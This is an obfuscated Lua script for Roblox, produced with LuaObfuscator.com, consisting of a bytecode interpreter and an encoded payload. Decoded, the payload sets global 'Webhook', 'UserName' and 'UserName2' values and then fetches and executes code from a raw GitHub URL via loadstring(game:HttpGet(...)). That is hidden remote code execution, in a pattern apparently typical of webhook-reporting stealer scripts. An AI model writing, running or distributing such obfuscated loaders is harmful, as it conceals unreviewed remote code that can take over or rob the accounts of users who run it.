--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v69-(v69%((2569 -(1523 + 114)) -(857 + 74))) ;else local v70=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v70 + v70))>=v70) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + 4 ;v34=1271 -(226 + 1044) ;end if (v34==1) then return (v38 * (73054774 -56277558)) + (v37 * (65653 -(32 + 85))) + (v36 * (251 + (962 -(892 + 65)))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=37 -(24 + 13) ;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v39==0) then local v74=1482 -(1395 + 87) ;while true do if (v74~=0) then else v40={};v41={};v74=1375 -(729 + 645) ;end if (v74==1) then v42={};v43={v40,v41,nil,v42};v74=2;end if (v74==2) then v39=1;break;end end end if (v39~=(3 -2)) then else local v75=0;while true do if (v75==0) then v44=v24();v45={};v75=1 -0 ;end if (v75~=1) then else for v101=1 + 0 ,v44 do local v102=0;local v103;local v104;local v105;while true do if (v102==1) then v105=nil;while true do if (v103~=(1 -0)) then else if (v104==(1 + 0)) then v105=v22()~=(1474 -(1329 + 145)) ;elseif (v104==(973 -(140 + 831))) then v105=v25();elseif (v104~=(1853 -(1409 + 441))) then else v105=v26();end v45[v101]=v105;break;end if (v103==0) then local v116=0;while true do if (v116==(719 -(15 + 703))) then v103=1 + 0 ;break;end if (v116==(438 -(262 + 176))) then local v160=0;while true do if ((1721 -(345 + 1376))~=v160) then else local v179=0;while true do if (v179==(689 -(198 + 490))) then v160=4 -3 ;break;end if (0==v179) then v104=v22();v105=nil;v179=1;end end end if ((2 -1)==v160) then v116=1207 -(696 + 510) ;break;end end end end end end break;end if (v102~=(0 -0)) then else local v113=1262 -(1091 + 171) ;while true do if (v113==(0 + 0)) then v103=0;v104=nil;v113=3 -2 ;end if (v113~=1) then else v102=1;break;end end end end end v43[3]=v22();v75=2;end if (v75~=(6 -4)) then else v39=376 -(123 + 251) ;break;end end end if (v39==(9 -7)) then local v76=0;local v77;while true do if ((698 -(208 + 490))==v76) then v77=0 + 0 ;while true do local v106=0;while true do if (v106==0) then if (1==v77) then return v43;end if (v77==(0 + 0)) then local v114=836 -(660 + 176) ;while true do if (v114==(0 + 0)) then for v161=203 -(14 + 188) ,v24() do local v162=675 -(534 + 141) ;local v163;local v164;local v165;while true do if (v162~=0) then else v163=0 + 0 ;v164=nil;v162=1 + 0 ;end if (v162~=(1 + 0)) then else v165=nil;while true do if (v163==0) then local v180=0;while true do if (v180==1) then v163=1 -0 ;break;end if (v180~=(0 -0)) then else v164=0 -0 ;v165=nil;v180=1 + 0 ;end end end if (v163==(1 + 0)) then while true do if (v164~=(396 -(115 + 281))) then else v165=v22();if (v21(v165,2 -1 ,1)~=(0 + 0)) then else local v181=0;local v182;local v183;local v184;local v185;local v186;while true do if (1==v181) then v184=nil;v185=nil;v181=2;end if (v181~=(0 -0)) then else v182=0 -0 ;v183=nil;v181=868 -(550 + 317) ;end if (v181==2) then v186=nil;while true do if (v182==(1 -0)) then local v187=0;while true do if (v187~=0) then else v185=nil;v186=nil;v187=1;end if ((1 -0)==v187) then v182=5 -3 ;break;end end end if (v182==2) then while true do if (v183==0) then local v189=0;local v190;while true do if (v189~=(285 -(134 + 151))) then else v190=0;while true do if (v190==(1666 -(970 + 695))) then v183=1 -0 ;break;end if (v190==0) then local v199=1990 -(582 + 1408) ;local v200;while true do if (v199==0) then v200=0 -0 ;while true do if (v200==0) then v184=v21(v165,2,3 -0 );v185=v21(v165,15 -11 ,1830 -(1195 + 629) );v200=1 -0 ;end if (v200~=(242 -(187 + 54))) then else v190=781 -(162 + 618) ;break;end end break;end end end end break;end end end if (v183==2) then local v191=0 + 0 ;local v192;while true do if (v191~=0) then else v192=0 + 0 ;while true do if ((0 -0)==v192) then local v201=0 -0 ;while true do if (v201~=0) then else if (v21(v185,1 + 0 ,1)==(1637 -(1373 + 263))) then v186[2]=v45[v186[2]];end if (v21(v185,1002 -(451 + 549) ,2)~=1) then else v186[3]=v45[v186[3]];end v201=1;end if (v201==1) then v192=1;break;end end end if (v192==(1 + 0)) then v183=3;break;end end break;end end end if (v183==1) then local v193=0 -0 ;local v194;local v195;while true do if (v193~=1) then else while true do if (v194==(0 -0)) then v195=1384 -(746 + 638) ;while true do if (v195~=(0 + 0)) then else v186={v23(),v23(),nil,nil};if (v184==0) then local v206=1581 -(1535 + 46) ;local v207;while true do if (v206~=(0 + 0)) then else v207=0;while true do if (v207==(0 + 0)) then v186[563 -(306 + 254) ]=v23();v186[1 + 3 ]=v23();break;end end break;end end elseif (v184==1) then v186[5 -2 ]=v24();elseif (v184==(1469 -(899 + 568))) then v186[3]=v24() -((2 + 0)^(38 -22)) ;elseif (v184==3) then local v212=603 -(268 + 335) ;local v213;while true do if ((290 -(60 + 230))==v212) then v213=572 -(426 + 146) ;while true do if (v213==0) then v186[3]=v24() -(2^16) ;v186[4]=v23();break;end end break;end end end v195=1;end if (v195==1) then v183=1 + 1 ;break;end end break;end end break;end if (v193==(1456 -(282 + 1174))) then v194=0;v195=nil;v193=812 -(569 + 242) ;end end end if (v183~=3) then else if (v21(v185,8 -5 ,1 + 2 )==1) then v186[1028 -(706 + 318) ]=v45[v186[4]];end v40[v161]=v186;break;end end break;end if (v182==(1251 -(721 + 530))) then local v188=1271 -(945 + 326) ;while true do if (v188~=(2 -1)) then else v182=1;break;end if (v188==0) then v183=0 + 0 ;v184=nil;v188=701 -(271 + 429) ;end end end end break;end end end break;end end break;end end break;end end end for v166=1,v24() do v41[v166-1 ]=v29();end v114=1 + 0 ;end if (1==v114) then v77=1501 -(1408 + 92) ;break;end end end break;end end end break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=1086 -(461 + 625) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1289 -(993 + 295))) then v49=1 + 0 ;v50=(v21(v48,1,44 -24 ) * ((1 + 1)^(198 -(122 + 35 + 9)))) + v47 ;v46=1173 -(418 + 753) ;end if (v46==(1 + (1 -0))) then v51=v21(v48,3 + 18 ,10 + 21 );v52=((v21(v48,27 + 5 )==(1 + 0)) and  -(530 -(406 + 123))) or 1 ;v46=1772 -(1749 + 20) ;end if ((0 + 0)==v46) then v47=v24();v48=v24();v46=1 + 0 ;end if (v46==(1260 -(1043 + 214))) then if (v51==(1322 -(365 + 884 + 73))) then if (v50==(0 + 0)) then return v52 * ((582 + 563) -(466 + 245 + 434)) ;else local v107=(0 -0) -0 ;while true do if (v107==(0 -0)) then v51=1901 -((232 -(116 + 10)) + 1794) ;v49=0 + 0 ;break;end end end elseif (v51==((6306 -3846) -(15 + 398))) then return ((v50==(0 + 0 + 0)) and (v52 * ((2 -(739 -(542 + 196)))/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(2769 -1746) ) * (v49 + (v50/((116 -((1555 -(1126 + 425)) + 110))^(636 -(57 + 527))))) ;end end end v26=nil;function v26(v53)local v54=405 -(118 + 287) ;local v55;local v56;while true do if (v54==(979 -(553 + 424))) then v56={};for v81=(6 -3) -2 , #v55 do v56[v81]=v2(v1(v3(v55,v81,v81)));end v54=5 -(5 -3) ;end if (v54==(1122 -(118 + 1003))) then v55=v3(v16,v19,(v19 + v53) -(2 -1) );v19=v19 + v53 ;v54=2 + 0 ;end if (v54==(377 -(142 + 135 + 100))) then v55=nil;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=1 + 0 ;end if (v54==(1 + 2)) then return v6(v56);end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 -0 ;local v59;local v60;while true do if (v58==1) then return (v60 * (75 + 181)) + v59 ;end if (v58==((0 + 0) -0)) then v59,v60=v1(v16,v19,v19 + (755 -(239 + 514)) );v19=v19 + 1 + 1 ;v58=1330 -(797 + 532) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v71=0;while true do if (v71==0) then v20=v0(v3(v61,1,1));return "";end end else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v61,16));if v20 then local v108=v5(v73,v20);v20=nil;return v108;else return v73;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=11) then if (v96<=5) then if (v96<=2) then if (v96<=0) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96==1) then v87=v95[3];elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=3) then do return;end elseif (v96>4) then v93[v95[2]]();else v93[v95[2]]=v64[v95[3]];end elseif (v96<=8) then if (v96<=6) then local v117=v95[2];local v118=v93[v95[3]];v93[v117 + 1 ]=v118;v93[v117]=v118[v95[4]];elseif (v96>7) then v93[v95[2]][v95[3]]=v95[4];else local v144=0;local v145;while true do if (v144==0) then v145=v95[2];v93[v145]=v93[v145](v13(v93,v145 + 1 ,v88));break;end end end elseif (v96<=9) then v93[v95[2]]=v95[3];elseif (v96==10) then v93[v95[2]]=v95[3]~=0 ;else for v168=v95[2],v95[3] do v93[v168]=nil;end end elseif (v96<=17) then if (v96<=14) then if (v96<=12) then do return;end elseif (v96>13) then local v147=v95[2];local v148=v93[v95[3]];v93[v147 + 1 ]=v148;v93[v147]=v148[v95[4]];else v93[v95[2]][v95[3]]=v95[4];end elseif (v96<=15) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==0) then v125=v95[2];v126,v127=v86(v93[v125](v13(v93,v125 + 1 ,v95[3])));v124=1;end if (v124==2) then for v174=v125,v88 do v128=v128 + 1 ;v93[v174]=v126[v128];end break;end if (v124==1) then v88=(v127 + v125) -1 ;v128=0;v124=2;end end elseif (v96==16) then local v154=v95[2];v93[v154]=v93[v154](v13(v93,v154 + 1 ,v88));else v87=v95[3];end elseif (v96<=20) then if (v96<=18) then v93[v95[2]]=v64[v95[3]];elseif (v96==19) then for v171=v95[2],v95[3] do v93[v171]=nil;end else v93[v95[2]]=v95[3];end elseif (v96<=21) then local v131=v95[2];local v132,v133=v86(v93[v131](v13(v93,v131 + 1 ,v95[3])));v88=(v133 + v131) -1 ;local v134=0;for v135=v131,v88 do v134=v134 + 1 ;v93[v135]=v132[v134];end elseif (v96==22) then v93[v95[2]]=v95[3]~=0 ;else v93[v95[2]]();end v87=v87 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200253O0012143O00014O0013000100013O00264O0002000100010004013O00020001001214000100013O00262O00010012000100020004013O00120001002O12000200033O00300D000200040005002O12000200063O002O12000300073O002006000300030008001214000500094O0016000600014O0015000300064O000700023O00022O00170002000100010004013O0024000100262O00010005000100010004013O00050001001214000200013O00262O00020019000100020004013O00190001001214000100023O0004013O0005000100262O00020015000100010004013O00150001002O12000300033O00300D0003000A0005002O12000300033O00300D0003000B0005001214000200023O0004013O001500010004013O000500010004013O002400010004013O000200012O00033O00017O00",v9(),...);end
